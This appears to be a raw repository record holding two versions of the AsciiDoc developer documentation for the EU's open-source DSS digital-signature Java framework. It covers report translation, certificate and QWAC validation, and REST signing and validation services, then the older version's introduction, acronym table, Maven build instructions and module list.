a language for reports generated by DSS. The current version of the framework allows customization of text values only for a `DetailedReport`.\n\nA target language of the report can be set with the following code:\n\n[source,java,indent=0]\n.Language customization\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/Snippets.java[tags=i18n]\n----\n\nIn case if no language is specified, the framework will use a default Locale obtained from OS on a running machine. If a requested language is not found, a default translation will be used.\n\nAs a default configuration DSS provides English translation.\n\nIn order to provide a custom translation, a new file must be created inside `src\\main\\resources` directory of your project with a name followed by one of the patterns: \n\n`dss-messages_XX.properties` or \n`dss-messages_XX_YY.properties`, where:\n\n * XX - an abbreviation of a target language;\n * YY - a country code.\n\nFor example, for a French language a file with a name `dss-messages_fr.properties` need to be created, or `dss-messages_fr_FR.properties` to use it only in France local.\n\n== Additional features\n\n=== Certificate validation\n\nDSS offers the possibility to validate a certificate. For a given certificate, the framework builds a certificate path until a known trust anchor (trusted list, keystore,...), validates each found certificate (OCSP \/ CRL) and determines its European \"qualification\". \n\nTo determine the certificate qualification, DSS follows the draft standard ETSI TS 119 172-4 (<<R10>>). It analyses the certificate properties (QCStatements, Certificate Policies,...) and applies possible overrules from the related trusted list (\"catched\" qualifiers from a trust service). More information about qualifiers can be found in the standard ETSI TS 119 612 (<<R11>>).\n\nDSS always computes the status at 2 different times : certificate issuance and signing\/validation time. The certificate qualification can evolve in the time, its status is not immutable (eg: a trust service provider lost its granted status). The eIDAS regulation (<<R12>>) clearly defines these different times in the Article 32 and related Annex I. \n\n[source,java,indent=0]\n.Validate a certificate and retrieve its qualification level\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/validate\/CertificateValidationTest.java[tags=demo]\n----\n\n=== SSL Certificate validation (QWAC)\n\nWith DSS, that's also possible to validate SSL certificate against the EUMS TL and the ETSI TS 119 615 to determine if it is a Qualified certificate for WebSite Authentication (QWAC).\n\n[source,java,indent=0]\n.Validate a SSL certificate and retrieve its qualification level\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/validate\/QWACValidationTest.java[tags=demo]\n----\n\n=== Extract the signed data from a signature\n\nDSS is able to retrieve the original data from a valid signature. \n\n[source,java,indent=0]\n.Retrieve original data from a signed document\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/validate\/RetrieveOriginalDocumentTest.java[tags=demo]\n----\n\n== REST and SOAP Services\n\nDSS offers REST and SOAP web services. Additionally, we also provide a SOAP-UI project and Postman samples in the `dss-cookbook` module.\n\nThe different webservices are : \n\n * Signature webservices (`dss-signature-soap` \/ `dss-signature-rest`) and their clients : they expose methods to allow signing and extending or counter-signing a signature from a client.\n * Server-signing webservice (`dss-server-signing-soap` \/ `dss-server-signing-rest`) and their clients : they expose method to retrieve keys from a server (PKCS#11, PKCS#12, HSM,...) and to sign the digest on the server side.\n * Signature validation webservices (`dss-validation-soap` \/ `dss-validation-rest`) and their clients : they expose methods to allow signature validation, with an optional detached file and an optional validation policy.\n * Certificate validation webservices (`dss-certificate-validation-soap` \/ `dss-certificate-validation-rest`) and their clients : they expose methods to allow certificate validation, with an optional provided certificate chain and custom validation time.\n * Timestamp webservices (`dss-timestamp-remote-soap` \/ `dss-timestamp-remote-rest`) and their clients : they expose methos to allow remote timestamp creation, by providing digest value to be timestamped and a digest algorithm, used for the digets calculation.\n \nThe data structure in webservices is similar in both REST and SOAP modules.\n\nThe documentation will covers the REST calls. All the REST services present in DSS are compliant with https:\/\/www.openapis.org\/[OpenAPI Specification].\n\n=== REST signature service\n\nThis service exposes 4 methods for one or more document(s) : \n\n[source,java,indent=0]\n.Rest signature service\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/RestSignatureServiceSnippet.java[tags=demo]\n----\n \n==== Get data to sign\n\nThe method allows retrieving the data to be signed. The user sends the document to be signed, the parameters (signature level,...) and the certificate chain. \n\nWARNING: The parameters in getDataToSign and signDocument MUST be the same (especially the signing date).\n\n.Request\ninclude::_restdocs\/sign-and-extend-one-document\/1\/http-request.adoc[]\n\n.Response\ninclude::_restdocs\/sign-and-extend-one-document\/1\/http-response.adoc[]\n\n==== Sign document\n\nThe method allows generation of the signed document with the received signature value.\n\nWARNING: The parameters in getDataToSign and signDocument MUST be the same (especially the signing date).\n\n.Request\ninclude::_restdocs\/sign-and-extend-one-document\/2\/http-request.adoc[]\n\n.Response\ninclude::_restdocs\/sign-and-extend-one-document\/2\/http-response.adoc[]\n\n==== Extend document\n\nThe method allows extension of an existing signature to a stronger level.\n\n.Request\ninclude::_restdocs\/sign-and-extend-one-document\/3\/http-request.adoc[]\n\n.Response\ninclude::_restdocs\/sign-and-extend-one-document\/3\/http-response.adoc[]\n\n==== Timestamp document\n\nThe method allows timestamping of a provided document.\nAvailable for PDF, ASiC-E and ASiC-S container formats.\n\n.Request\ninclude::_restdocs\/timestamp-one-document\/1\/http-request.adoc[]\n\n.Response\ninclude::_restdocs\/timestamp-one-document\/1\/http-response.adoc[]\n\n==== Get data to be counter signed\n\nThis method returns the data to be signed in order to create a counter signature. The user should provide a document containing a signature to be counter signed, id of the signature, and other parameters similarly to the method 'getDataToSign()'.\n\nWARNING: The parameters in getDataToBeCounterSigned and counterSignSignature MUST be the same (especially the signing date).\n\n.Request\ninclude::_restdocs\/counter-sign-signature\/1\/http-request.adoc[]\n\n.Response\ninclude::_restdocs\/counter-sign-signature\/1\/http-response.adoc[]\n\n==== Counter Sign Signature\n\nThis method incorporates a created counter signature to unsigned properties of the master signature with this specified id.\n\nWARNING: The parameters in getDataToBeCounterSigned and counterSignSignature MUST be the same (especially the signing date).\n\n.Request\ninclude::_restdocs\/counter-sign-signature\/2\/http-request.adoc[]\n\n.Response\ninclude::_restdocs\/counter-sign-signature\/2\/http-response.adoc[]\n\n=== REST server signature service\n\nThis service also exposed 4 methods : \n\n[source,java,indent=0]\n.Rest server signing service\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/RestServerSigningSnippet.java[tags=demo]\n----\n\n==== Get keys\n\nThis method allows retrieving of all available keys on the server side (PKCS#11, PKCS#12, HSM,...). All keys will have an alias, a signing certificate and its chain. The alias will be used in following steps.\n\n.Request\ninclude::_restdocs\/get-keys\/1\/http-request.adoc[]\n\n.Response\ninclude::_restdocs\/get-keys\/1\/http-response.adoc[]\n\n==== Get key\n\nThis method allows retrieving a key information for a given alias.\n\n.Request\ninclude::_restdocs\/get-key\/1\/http-request.adoc[]\n\n.Response\ninclude::_restdocs\/get-key\/1\/http-response.adoc[]\n\n==== Sign\n\nThis method allows signing of given digests with a server side certificate.\n\n.Request\ninclude::_restdocs\/sign-digest-document-remotely\/3\/http-request.adoc[]\n\n.Response\ninclude::_restdocs\/sign-digest-document-remotely\/3\/http-response.adoc[]\n\n=== REST validation service\n\nDSS provides also a module for documents validation.\n\n==== Validate a document\n\nThis service allows a signature validation (all formats\/types) against a validation policy.\n\n.Request\ninclude::_restdocs\/validate-doc\/1\/http-request.adoc[]\n\n.Response\ninclude::_restdocs\/validate-doc\/1\/http-response.adoc[]\n\n==== Retrieve original document(s)\n\nThis service returns the signed data for a given signature.\n\n.Request\ninclude::_restdocs\/get-original-documents\/1\/http-request.adoc[]\n\n.Response\ninclude::_restdocs\/get-original-documents\/1\/http-response.adoc[]\n\n=== REST certificate validation service\n\n==== Validate a certificate\n\nThis service allows a certificate validation (provided in a binary format).\n\n.Request\ninclude::_restdocs\/validate-cert\/1\/http-request.adoc[]\n\n.Response\ninclude::_restdocs\/validate-cert\/1\/http-response.adoc[]\n\n=== REST remote timestamp service\n\n==== Get Timestamp Response\n\nThis service allows a remote timestamp creation. The method takes as an input the digest to be timestamped and digest algorithm that has been used for the digest value computation. The output of the method is the generated timestamp's binaries.\n\n.Request\ninclude::_restdocs\/get-timestamp-response\/1\/http-request.adoc[]\n\n.Response\ninclude::_restdocs\/get-timestamp-response\/1\/http-response.adoc[]\n","old_contents":":toc: left\n:icons: font\n:icon-set: far\n= Digital Signature Service\n:description: Documentation of the open source project DSS (Digital Signature Service). This project allows producing\/validation of Advanced electronic signatures (AdES).\n:keywords: electronic signature, XAdES, CAdES, PAdES, ASiC, open source, validation\nversion : {dssVersion} - {docdate}\n\n== Introduction\n\n=== Purpose of the document\n\nThis document describes some examples of how to develop in Java using the DSS framework. The aim is to show to the developers, in a progressive manner, the different uses of the framework. It will familiarize them with the code step by step.\n\n=== Scope of the document\n\nThis document provides examples of code which allow easy handling of digital signatures. The examples are consistent with the Release {dssVersion} of DSS framework which can be downloaded via https:\/\/ec.europa.eu\/cefdigital\/wiki\/display\/CEFDIGITAL\/DSS+releases\n\nThree main features can be distinguished within the framework :\n\n * The digital signature;\n * The extension of a digital signature and;\n * The validation of a digital signature.\n \nOn a more detailed manner the following concepts and features are addressed in this document:\n \n * Formats of the signed documents: XML, JSON, PDF, DOC, TXT, ZIP...;\n * Packaging structures: enveloping, enveloped, detached and internally-detached;\n * Forms of digital signatures: XAdES, CAdES, PAdES, JAdES and ASiC-S\/ASiC-E;\n * Profiles associated to each form of the digital signature;\n * Trust management;\n * Revocation data handling (OCSP and CRL sources);\n * Certificate chain building;\n * Signature validation and validation policy;\n * Signature qualification;\n * Validation reports (Simple, Detailed, ETSI Validation report);\n * Management of signature tokens;\n * Validation of the signing certificate;\n * Timestamp creation;\n * Timestamp validation and qualification;\n * REST and SOAP webservices.\n\nThis is not an exhaustive list of all the possibilities offered by the framework and the proposed examples cover only the most useful features. However, to discover every detail of the operational principles of the framework, the JavaDoc is available within the source code.\n\nPlease note that the DSS framework is still under maintenance and new features will be released in the future.\n\n=== Abbreviations and Acronyms\n\n[cols=2]\n.Abbreviations and Acronyms\n|=======================\n|Code\t\t\t|Description\n|AdES\t\t\t|Advanced Electronic Signature\n|API\t\t\t|Application Programming Interface\n|ASiC\t\t\t|Associated Signature Containers\n|BB\t\t\t\t|Building Block (CEF)\n|CA\t\t\t\t|Certificate authority\n|CAdES\t\t\t|CMS Advanced Electronic Signatures\n|CD\t\t\t\t|Commission Decision\n|CEF\t\t\t|Connecting Europe Facility\n|CMS\t\t\t|Cryptographic Message Syntax\n|CRL\t\t\t|Certificate Revocation List\n|CSP\t\t\t|Core Service Platform (CEF)\n|CSP\t\t\t|Cryptographic Service Provider\n|DER\t\t\t|Distinguished Encoding Rules\n|DSA\t\t\t|Digital Signature Algorithm - an algorithm for public-key cryptography\n|DSI\t\t\t|Digital Service Infrastructure (CEF)\n|DSS\t\t\t|Digital Signature Service\n|EC\t\t\t\t|European Commission\n|eID\t\t\t|Electronic Identity Card\n|ESI\t\t\t|Electronic Signatures and Infrastructures\n|ETSI\t\t\t|European Telecommunications Standards Institute\n|EUPL\t\t\t|European Union Public License\n|FSF\t\t\t|Free Software Foundation\n|GS\t\t\t\t|Generic Service (CEF)\n|GUI\t\t\t|Graphical User Interface\n|HSM\t\t\t|Hardware Security Modules\n|HTTP\t\t\t|Hypertext Transfer Protocol\n|I18N\t\t\t|Internationalization\n|JAdES |JSON Advanced Electronic Signatures\n|Java EE\t\t|Java Enterprise Edition\n|JavaDoc\t\t|JavaDoc is developed by Sun Microsystems to create API documentation in HTML format from the comments in the source code. JavaDoc is an industrial standard for documenting Java classes.\n|JAXB\t\t\t|Java Architecture for XML Binding\n|JCA\t\t\t|Java Cryptographic Architecture\n|JCE\t\t\t|Java Cryptography Extension\n|JDBC\t\t\t|Java DataBase Connectivity\n|JWS\t\t\t|JSON Web Signatures\n|LGPL\t\t\t|Lesser General Public License\n|LOTL\t\t\t|List of Trusted List or List of the Lists\n|LSP\t\t\t|Large Scale Pilot\n|MIT\t\t\t|Massachusetts Institute of Technology\n|MOCCA\t\t\t|Austrian Modular Open Citizen Card Architecture; implemented in Java\n|MS \/ EUMS\t\t|Member State\n|MS CAPI\t\t|Microsoft Cryptographic Application Programming Interface\n|OCF\t\t\t|OEBPS Container Format\n|OCSP\t\t\t|Online Certificate Status Protocol\n|ODF\t\t\t|Open Document Format\n|ODT\t\t\t|Open Document Text\n|OEBPS\t\t\t|Open eBook Publication Structure\n|OID\t\t\t|Object Identifier\n|OOXML\t\t\t|Office Open XML\n|OSI\t\t\t|Open Source Initiative\n|OSS\t\t\t|Open Source Software\n|PAdES\t\t\t|PDF Advanced Electronic Signatures\n|PC\/SC\t\t\t|Personal computer\/Smart Card\n|PDF\t\t\t|Portable Document Format\n|PDFBox\t\t\t|Apache PDFBox - A Java PDF Library: http:\/\/pdfbox.apache.org\/\n|PKCS\t\t\t|Public Key Cryptographic Standards\n|PKCS#12\t\t|It defines a file format commonly used to store X.509 private key accompanying public key certificates, protected by symmetrical password\n|PKIX\t\t\t|Internet X.509 Public Key Infrastructure\n|RSA\t\t\t|Rivest Shamir Adleman - an algorithm for public-key cryptography\n|SCA\t\t\t|Signature Creation Application\n|SCD\t\t\t|Signature Creation Device\n|SME\t\t\t|Subject Matter Expert\n|SMO\t\t\t|Stakeholder Management Office (CEF)\n|SOAP\t\t\t|Simple Object Access Protocol\n|SSCD\t\t\t|Secure Signature-Creation Device\n|SVA\t\t\t|Signature Validation Application\n|TL\t\t\t\t|Trusted List\n|TLManager\t\t|Application for managing trusted lists.\n|TSA\t\t\t|Time Stamping Authority\n|TSL\t\t\t|Trust-service Status List\n|TSP\t\t\t|Time Stamp Protocol\n|TSP\t\t\t|Trusted Service Provider\n|TST\t\t\t|Time-Stamp Token\n|UCF\t\t\t|Universal Container Format\n|URI\t\t\t|Uniform Resource Identifier\n|WSDL\t\t\t|Web Services Description Language\n|WYSIWYS\t\t|What you see is what you sign\n|XAdES\t\t\t|XML Advanced Electronic Signatures\n|XML\t\t\t|Extensible Markup Language\n|ZIP\t\t\t|File format used for data compression and archiving\n|=======================\n\n=== References\n\n[%header,cols=4]\n.References\n|=======================\n|Ref.\t\t\t|Title\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t|Reference\t\t\t\t\t|Version\n|[[R01]]\tR01\t|ESI - XAdES digital signatures\t\t\t\t\t\t\t\t\t\t\t\t\t|ETSI EN 319 132 part 1-2\t|1.1.1\n|[[R02]]\tR02\t|ESI - CAdES digital signatures\t\t\t\t\t\t\t\t\t\t\t\t\t|ETSI EN 319 122 part 1-2\t|1.1.1\n|[[R03]]\tR03\t|ESI - PAdES digital signatures\t\t\t\t\t\t\t\t\t\t\t\t\t|ETSI EN 319 142 part 1-2\t|1.1.1\n|[[R04]]\tR04\t|ESI - Associated Signature Containers (ASiC)\t\t\t\t\t\t\t\t\t|ETSI EN 319 162 part 1-2\t|1.1.1\n|[[R05]]\tR05\t|ESI - JAdES digital signatures\t\t\t\t\t\t\t\t\t\t\t\t\t|ETSI TS 119 182 part 1 \t|draft 0.0.6\n|[[R06]]\tR06\t|Document management - Portable document format - Part 1: PDF 1.7\t\t\t\t|ISO 32000-1\t\t\t\t|1\n|[[R07]]\tR07\t|Directive 1999\/93\/EC of the European Parliament and of the Council of 13 December 1999 on a Community framework for electronic signatures.\t|DIRECTIVE 1999\/93\/EC\t|\n|[[R08]]\tR08\t|Internet X.509 Public Key Infrastructure - Time-Stamp Protocol (TSP)\t\t\t|RFC 3161\t\t\t\t\t|\n|[[R09]]\tR09\t|ESI - Procedures for Creation and Validation of AdES Digital Signatures\t\t|ETSI EN 319 102-1\t\t\t|1.1.1\n|[[R10]]\tR10\t|ESI - Signature validation policy for European qualified electronic signatures\/seals using trusted lists |ETSI TS 119 172-4\t\t\t|draft\n|[[R11]]\tR11\t|ESI - Trusted Lists\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t|ETSI TS 119 612\t\t |2.1.1\n|[[R12]]\tR12\t|eIDAS Regulation No 910\/2014\t\t\t\t\t\t\t\t\t\t\t\t\t|910\/2014\/EU\t\t\t |\n|[[R13]]\tR13\t|ESI - Procedures for Creation and Validation of AdES Digital Signatures\t\t|ETSI TS 119 102-2\t\t |1.2.1\n|[[R14]]\tR14\t|ESI - Procedures for using and interpreting EU Member States national trusted lists\t\t\t\t\t\t|ETSI TS 119 615\t\t |draft\n\n|=======================\n\n=== Useful links\n\n * https:\/\/ec.europa.eu\/cefdigital\/wiki\/display\/CEFDIGITAL\/eSignature[CEF Digital]\n * https:\/\/ec.europa.eu\/cefdigital\/wiki\/display\/CEFDIGITAL\/eSignature+FAQ[eSignature FAQ]\n * https:\/\/webgate.ec.europa.eu\/tl-browser\/#\/[TL Browser]\n * https:\/\/ec.europa.eu\/cefdigital\/wiki\/display\/CEFDIGITAL\/eSignature+validation+tests[eSignature validation tests]\n * https:\/\/ec.europa.eu\/cefdigital\/wiki\/display\/TLSO\/Trusted+List+Manager+non-EU[Trusted List Manager non-EU]\n * https:\/\/github.com\/esig\/dss[Source code (GitHub)]\n * https:\/\/ec.europa.eu\/cefdigital\/code\/projects\/ESIG\/repos\/dss\/browse[Source code (EC Bitbucket)]\n * https:\/\/ec.europa.eu\/cefdigital\/code\/projects\/ESIG\/repos\/dss-demos\/browse[Source code demonstrations (EC Bitbucket)]\n * https:\/\/ec.europa.eu\/cefdigital\/tracker\/projects\/DSS\/issues[Report an issue (EC Jira)]\n * https:\/\/esig-dss.atlassian.net\/projects\/DSS[Old Jira] \n\n== Build instructions\n\nThe section explains the basic steps required to successfully build the DSS components.\n\n=== DSS Core\n\nThis section explains the build and usage requirements for https:\/\/github.com\/esig\/dss[DSS framework].\n\n==== Requirements\n\nThe latest version of DSS framework has the following minimal requirements:\n\n * Java 9 and higher (tested up to Java 15) for the build is required. For usage Java 8 is a mimimum requirement;\n * Maven 3.6 and higher;\n * Memory and Disk: see minimal requirements for the used JVM. In general the higher available is better;\n * Operating system: no specific requirements (tested on Windows and Linux).\n \nNOTE: We strongly recommend using the latest available version of JDK, in order to have the latest security fixes and cryptographical algorithm updates.\n\nWARNING: Before processing the build steps, please, ensure you have successfully installed Maven and JVM with a required version.\n\n==== Adding as Maven dependency\n\nThe simplest way to include DSS to your Maven project is to add a repository into pom.xml file in the root directory of your project as following:\n\n[source,xml]\n----\n<repositories>\n\t...\n\n\t<repository>\n\t <id>cefdigital<\/id>\n\t <name>cefdigital<\/name>\n\t <url>https:\/\/ec.europa.eu\/cefdigital\/artifact\/content\/repositories\/esignaturedss\/<\/url>\n\t<\/repository>\n<\/repositories>\n----\n\nAfter that specify a list of dependencies required for your project.\n\nRefresh your project, in order to download the dependency and after you will be able to use all modules of DSS framework.\n\n==== Maven build and profiles\n\nIn order to use a customized bundle of DSS, you may want to build the DSS Core framework modules.\n\nNOTE: If you have implemented a new feature or fixed a bug issue, your pull requests are welcome at our https:\/\/github.com\/esig\/dss[GitHub Repository]\n\nA simple build of the DSS Maven project can be done with the following command:\n\n----\nmvn clean install\n----\n\nNOTE: All listed commands must be executed from the project directory via a Command Line Interface (CLI).\n\nThis installation will run all unit tests present in the modules, which can take more than one hour to do the complete build.\n\nIn addition to the general build, the framework provides a list of custom profiles, allowing a customized behavior:\n\n * quick - disables unit tests and java-doc check, in order to process the build as quick as possible (takes 2-3 minutes).\n * slow-tests - executes all tests, including time-consuming unit tests.\n * owasp - runs validation of the project and using dependencies according to the https:\/\/nvd.nist.gov[National Vulnerability Database (NVD)].\n * jdk19-plus - executed automatically for JDK version 9 and higher. Provides a support of JDK 8 with newer versions.\n * spotless - used to add a licence header into project files.\n\nWARNING: Some modules (e.g. `dss-utils`, `dss-crl-parser`, etc., see below) still have to be built completely when using the `quick` profile.\n \nIn order to run a build with a specific profile, the following command must be executed:\n\n----\nmvn clean install -P *profile_name*\n----\n\n==== Specific modules\n\nSome modules of DSS framework have a specific behavior and need to be handled accordingly.\n\nDSS contains a bundle of JAXB-based modules, generation Java classes in runtime based on XSD-schema. When any change is made in the XSD, the classes of the module are being re-generated according to the change. The following modules represent this behavior:\n\n * specs-xmldsig;\n * specs-xades;\n * specs-trusted-list;\n * specs-validation-report;\n * specs-asic-manifest;\n * specs-saml-assertion;\n * dss-policy-jaxb;\n * dss-diagnostic-jaxb;\n * dss-detailed-report-jaxb;\n * dss-simple-report-jaxb;\n * dss-simple-certificate-report-jaxb.\n\nSpecific modules with JWS and JAdES specifications exist. These modules allow to validate the generated JSON against the related JSON Schema :\n\n * specs-jws;\n * specs-jades.\n\nAlso, as it was explained in the previous section, some modules are required to be built completely for a building of their dependent modules when using a quick profile, namely:\n\n * dss-utils;\n * dss-crl-parser;\n * dss-test;\n * dss-pades;\n * dss-asic-common.\n\nThe modules contain common interfaces, used in other DSS modules, as well as unit tests to ensure the equal behavior between their implementations.\n\n==== Documentation generation\n\nIn order to generate HTML and PDF documentation for DSS project, the module `dss-cookbook` of DSS Core must be build with the following command (please, ensure that you are located in the `\/dss-cookbook` directory):\n\n----\nmvn clean install -P asciidoctor\n----\n\n==== Javadoc generation\n\nIn order to generate https:\/\/ec.europa.eu\/cefdigital\/DSS\/webapp-demo\/apidocs\/index.html[HTML Javadoc], you will need to build completely the DSS Core.\n\n[[DSSDemo]]\n=== DSS Demonstrations\n\nThis section explains the build and usage requirements for https:\/\/github.com\/esig\/dss-demonstrations[DSS Demonstration Applications].\n\n==== Requirements\n\nThe minimal requirements to build\/run DSS Demonstrations:\n\n * Java 8 and higher (tested up to Java 15) is required;\n * Maven 3.6 and higher (if build required);\n * Tomcat 8.5+ for Java 8 and Tomcat 9+ for Java 9 and higher (for Web-application);\n * Memory and Disk: see minimal requirements for the used JVM. In general the higher available is better;\n * Operating system: no specific requirements (tested on Windows and Linux).\n\n==== Maven build\n\nThe build of the project can be done similarly to DSS Core framework build with the command `mvn clean install`.\n\nPlease, ensure, that you build modules what you really need. Ignore, build failures for non-required modules.\n\n===== DSS Standalone Application\n\nIn order to build the standalone application, the following modules are required:\n\n * dss-mock-tsa;\n * dss-standalone-app;\n * dss-standalone-package.\n \nIf the build is successfull, you will be able to find out the following containers in the directory `\/dss-standalone-app-package\/target\/`:\n\n * dss-standalone-app-package-minimal.zip - contains the application code. Requires JDK ad JavaFX installed on a target machine in order to run the application;\n * dss-standalone-app-package-complete.zip - contains the application code, as well as JDK and JavaFX library code. Can be run on a machine whithout pre-installed libraries.\n\nIn order to launch the application, you will need to extract the archive and run the file `dss-run.bat`.\n\n===== DSS Web Application\n\nTo build the DSS Web Application the following modules are required:\n\n * dss-mock-tsa;\n * dss-demo-webapp;\n * dss-demo-bundle.\n \nAfter a successful build, in the directory `\/dss-demo-bundle\/target\/` you will be able to find out two containers: `dss-demo-bundle.zip` and `dss-demo-bundle.tar.gz`. Despite the container type, the content of both files is the same. After extracting the content, you will need to run the file `Webapp-Startup.bat` in order to launch the server and the file `Webapp-Shutdown.bat` to stop the server. After running the server, the web-application will be availble at the address `http:\/\/localhost:8080\/`.\n\nIf during TL\/LOTL loading you experience problems with some particular Trusted Lists, please refer the chapter <<KeyStore>> for a resolution.\n\nThe documentation and javadoc will be copied automatically from built DSS Core and available on the following addresses respectively:\n\n * HTML documentation : `http:\/\/localhost:8080\/doc\/dss-documentation.html`;\n * PDF documentation : `http:\/\/localhost:8080\/doc\/dss-documentation.pdf`;\n * Javadoc : `http:\/\/localhost:8080\/apidocs\/index.html`.\n\nIn order to build a bundle for JDK 15, the following profile can be used from `dss-demo-bundle` module:\n\n----\nmvn clean install -P java15\n----\n\nThis will create a bundle with Tomcat 9.\n\n===== Integration tests\n\nThe `dss-demo-webapp` module provides a collection of integration tests in order to test the behavior of REST\/SOAP web-services. In order to run the tests, a web-server with DSS Web Application shall be launched and the following profile need to be executed from the module:\n\n----\nmvn clean install -P run-integration-test\n----\n\n== General framework structure\n\nDSS framework is a multi-modules project which can be built with Maven.\n\n=== Maven modules\n\n==== Shared modules\n\ndss-enumerations:: Contains a list of all used enumerations in the DSS project.\ndss-alerts:: Allows configuration of triggers and handers for arbitrary defined events.\ndss-jaxb-parsers:: Contains a list of all classes used to transform JAXB objects\/strings to Java objects and vice versa.\n\n==== JAXB model modules\n\nspecs-xmldsig:: W3C XSD schema for signatures http:\/\/www.w3.org\/2000\/09\/xmldsig\nspecs-xades:: ETSI EN 319 132-1 XSD schema for XAdES.\nspecs-trusted-list:: ETSI TS 119 612 XSD schema for parsing Trusted Lists.\nspecs-validation-report:: ETSI TS 119 102-2 XSD schema for the Validation report.\nspecs-asic-manifest:: ETSI EN 319 162 schema for ASiCManifest.\nspecs-saml-assertion:: OASIS schema for SAML Assertions.\n\n'''\ndss-policy-jaxb:: JAXB model of the validation policy.\ndss-diagnostic-jaxb:: JAXB model of the diagnostic data.\ndss-detailed-report-jaxb:: JAXB model of the detailed report.\ndss-simple-report-jaxb:: JAXB model of the simple report.\ndss-simple-certificate-report-jaxb:: JAXB model of the simple report for certificates.\n\n==== JSON validation modules\n\nspecs-jws:: JSON Schemas based on the RFC 7515 specifications (not official)\nspecs-jades:: ETSI TS 119 182-1 v.0.0.6 JSON Schemas for JAdES\n\n==== Utils modules\n\ndss-utils:: API with utility methods for String, Collection, I\/O,...\ndss-utils-apache-commons:: Implementation of dss-utils with Apache Commons libraries.\ndss-utils-google-guava:: Implementation of dss-utils with Google Guava.\n\n==== i18n\n\ndss-i18n:: a module allowing internationalization of generated reports.\n\n==== Core modules\n\ndss-model:: Data model used in almost every module.\ndss-crl-parser:: API to validate CRLs and retrieve revocation data\ndss-crl-parser-stream:: Implementation of dss-crl-parser which streams the CRL.\ndss-crl-parser-x509crl:: Implementation of dss-crl-parser which uses the java object X509CRL.\ndss-spi:: Interfaces, util classes to manipulate ASN1, compute digests,... \ndss-document:: Common module to sign and validate document. This module doen't contain any implementation.\ndss-service:: Implementations to communicate with online resources (TSP, CRL, OCSP). \ndss-token:: Token definitions and implementations for MS CAPI, PKCS#11, PKCS#12.\nvalidation-policy:: Business of the signature's validation (ETSI EN 319 102 \/ TS 119 172-4).\ndss-xades:: Implementation of the XAdES signature, extension and validation.\ndss-cades:: Implementation of the CAdES signature, extension and validation.\ndss-jades:: Implementation of the JAdES signature, extension and validation.\ndss-pades:: Common code which is shared between dss-pades-pdfbox and dss-pades-openpdf.\ndss-pades-pdfbox:: Implementation of the PAdES signature, extension and validation with https:\/\/pdfbox.apache.org\/[PDFBox].\ndss-pades-openpdf:: Implementation of the PAdES signature, extension and validation with https:\/\/github.com\/LibrePDF\/OpenPDF[OpenPDF (fork of iText)].\ndss-asic-common:: Common code which is shared between dss-asic-xades and dss-asic-cades.\ndss-asic-cades:: Implementation of the ASiC-S and ASiC-E signature, extension and validation based on CAdES signatures.\ndss-asic-xades:: Implementation of the ASiC-S and ASiC-E signature, extension and validation based on XAdES signatures.\ndss-tsl-validation:: Module which allows loading \/ parsing \/ validating of LOTL and TSLs.\n\n==== WebServices\n\ndss-common-remote-dto:: Common classes between all remote services (REST and SOAP).\ndss-common-remote-converter:: Classes which convert the DTO to DSS Objects.\n\n'''\ndss-signature-dto:: Data Transfer Objects used for signature creation\/extension (REST and SOAP).\ndss-signature-remote:: Common classes between dss-signature-rest and dss-signature-soap.\ndss-signature-rest-client:: Client for the REST webservices.\ndss-signature-rest:: REST webservices to sign (getDataToSign, signDocument methods), counter-sign and extend a signature.\ndss-signature-soap-client:: Client for the SOAP webservices.\ndss-signature-soap:: SOAP webservices to sign (getDataToSign, signDocument methods), counter-sign and extend a signature.\n\n'''\ndss-server-signing-dto:: Data Transfer Objects used for the server signing module (REST and SOAP).\ndss-server-signing-common:: Common classes for server signing.\ndss-server-signing-rest:: REST webservice for server signing.\ndss-server-signing-rest-client:: REST client for server signing (sign method).\ndss-server-signing-soap:: SOAP webservice for server signing.\ndss-server-signing-soap-client:: SOAP client for server signing (sign method).\n\n'''\ndss-validation-dto:: Data Transfer Objects used for signature validation (REST and SOAP).\ndss-validation-common:: Common classes between dss-validation-rest and dss-validation-soap.\ndss-validation-rest-client:: Client for the REST signature-validation webservices.\ndss-validation-soap-client:: Client for the SOAP signature-validation webservices.\ndss-validation-rest:: REST webservices to validate a signature.\ndss-validation-soap:: SOAP webservices to validate a signature.\n\n'''\ndss-certificate-validation-dto:: Data Transfer Objects used for certificate validation (REST and SOAP).\ndss-certificate-validation-common:: Common classes between dss-certificate-validation-rest and dss-certificate-validation-soap.\ndss-certificate-validation-rest-client:: Client for the REST certificate-validation webservice.\ndss-certificate-validation-soap-client:: Client for the SOAP certificate-validation webservice.\ndss-certificate-validation-rest:: REST webservice to validate a certificate.\ndss-certificate-validation-soap:: SOAP webservice to validate a certificate.\n\n'''\ndss-timestamp-dto:: Data Transfer Objects used for timestamp creation.\ndss-timestamp-remote-common:: Common classes between dss-timestamp-remote-rest and dss-timestamp-remote-soap.\ndss-timestamp-remote-rest-client:: Client for the REST timestamp webservice.\ndss-timestamp-remote-soap-client:: Client for the SOAP timestamp webservice.\ndss-timestamp-remote-rest:: REST webservice to create a timestamp.\ndss-timestamp-remote-soap:: SOAP webservice to create a timestamp.\n\n==== Other modules\n\ndss-test:: Mocks and util classes for unit tests.\ndss-cookbook:: Samples and documentation of DSS used to generate this documentation.\n\n[[dssUtils]]\n=== DSS Utils\n\nThe module dss-utils offers an interface with utility methods to operate on String, Collection, I\/O,... DSS framework provides two different implementations with the same behaviour : \n\n * dss-utils-apache-commons : this module uses Apache Commons libraries (commons-lang3, commons-collection4, commons-io and commons-codec).\n * dss-utils-google-guava : this module only requires Google Guava (recommended on Android).\n\nIf your integration include dss-utils, you will need to select an implementation.\n\n[[dssCrlParser]]\n=== DSS CRL Parser\n\nDSS contains two ways to parse\/validate a CRL and to retrieve revocation data. An alternative to the X509CRL java object was developed to face memory issues in case of large CRLs. The X509CRL object fully loads the CRL in memory and can cause OutOfMemoryError.\n\n * dss-crl-parser-x509crl : this module uses the X509CRL java object.\n * dss-crl-parser-streams : this module offers an alternative with a CRL streaming (experimental).\n 